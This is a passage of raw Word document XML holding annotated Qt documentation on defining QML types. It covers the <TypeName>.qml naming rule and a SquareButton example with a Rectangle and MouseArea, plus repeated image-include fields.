        <w:t>To create an object type, a QML document should be placed into a text file named as</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F640F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;TypeName&gt;.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;TypeName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is the desired name of the type, which must </w:t>
      </w:r>
      <w:r w:rsidRPr="003F640F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be comprised of</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> alphanumeric characters or underscores and beginning with an uppercase letter. This document is then </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>automatically recognized by the engine as a definition of a QML type</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Additionally, a type defined in this manner </w:t>
      </w:r>
      <w:r w:rsidRPr="004948B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is automatically made available to other QML files within the same directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the engine searches within the immediate directory when resolving QML type names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, below is a document that declares a</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId164" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a child</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId165" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The document has been saved to file named</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// SquareButton.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> side</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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width</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side</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height</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side</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</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anchors</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fill</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parent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onClicked</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Button clicked!"</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Since the file is named</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this can now be used as a type named</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by any other QML file within the same directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example, if there was a</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myapplication.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file in the same directory, it could refer to the</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// myapplication.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton</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centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
